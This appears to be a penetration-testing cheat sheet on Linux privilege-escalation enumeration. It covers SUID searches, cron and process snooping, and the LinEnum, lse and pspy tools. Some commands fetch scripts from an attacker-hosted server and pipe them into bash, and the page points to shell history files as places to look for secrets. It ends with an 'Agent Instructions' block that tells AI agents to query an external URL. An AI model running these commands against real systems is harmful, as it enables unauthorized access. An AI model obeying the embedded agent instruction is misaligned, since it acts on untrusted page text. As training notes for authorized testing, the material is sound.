# 2 Enums ## Start ``` sudo -l crontab -l ps auxww uname -a find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null pspy ..snoop processes find / -type f -user www-data 2>/dev/null ..files find / -type d -user www-data 2>/dev/null ..dirs ``` ## LinEnum * * Extracts large amount of target bits * Could find ports listening on localhost, that might have port-knocking or pivots * Used by IPPSec ``` wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh cp /opt/LinEnum/LinEnum.sh . python -m SimpleHTTPServer 80 cd /dev/shm/ ..ramdisk (data wont actually save to disk) cd /tmp ..optional (way i've been doing it) curl $MyIP:8000/LinEnum.sh -t | bash ..Easy execute and Thorough curl $MyIP:8000/LinEnum.sh -o LinEnum.sh ..Download LinEnum.sh -h ..help LinEnum.sh -k password -e export -t ..keyword, export, thorough ``` ## [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration) ``` wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh lse.sh -h ..help lse.sh -l 1 -i ..level 1.. i to not prompt-pass lse.sh -l 2 -i ..level 2.. print everything ``` ## PsPy32 * Snoop on processes/crons without needing root permissions. * Even finds root-crontabs * * ``` Copy it to the system with: chmod +x pspy32 python -m SimpleHTTPServer 80 wget http://10.10.14.34/pspy32 > ./pspy32 > ./pspy --help ``` ## Timers * Kinda like crons * REF: [procmon](/06-linux-privesc/02-monitor-files.md#watch-proc-procmon) ``` systemctl list-timers watch -n 1 'systemctl list-timers' ``` ## Tools * Get the tools.zip from [UdemyClass](/06-linux-privesc/lx-privesc.md#privesc-class), and save them as a toolset ## REFS * [FingerEnums](/02-scanning/02-enum-finger-and-ssh.md#enumerate-finger-users) * [LookAround](/06-linux-privesc/04-look-around.md) ## Bonus Enums: * [AutoRecon-Tib3rius](https://github.com/Tib3rius/AutoRecon) * [linted/linuxprivchecker](https://github.com/linted/linuxprivchecker.git) * [AlessandroZ/BeRoot](https://github.com/AlessandroZ/BeRoot) * [pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## SUID/SGID ``` find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null ``` ## Writeable ``` cd /var/www/html/webservices/monstra/ find . -writable -ls ``` ## Enumeration Plan 1. Check your id, whoami 2. Linux Smart Enumeration (lse) with increasing levels 1. lse 2. lse -l 1 3. lse -l 2 3. LinEnum and other scripts 4. If they are failing, run them manually 1. Or Check other cheatsheets 2. 5. Check common file 1. /var/backup 2. /var/logs 3. /tmp 4. /home/user/.\*history Try easy ones first: 1. sudo, cron, suid 2. root processes, enumerate version, check exploits 3. internal ports you can forward to your-remote-machine Harder: 1. Re-read your enums, look for oddities 2. Unusual file-systems (not ext,swap,tmpfs) 3. Strange usernames 4. Kernel exploits --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/06-linux-privesc/lx-enum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.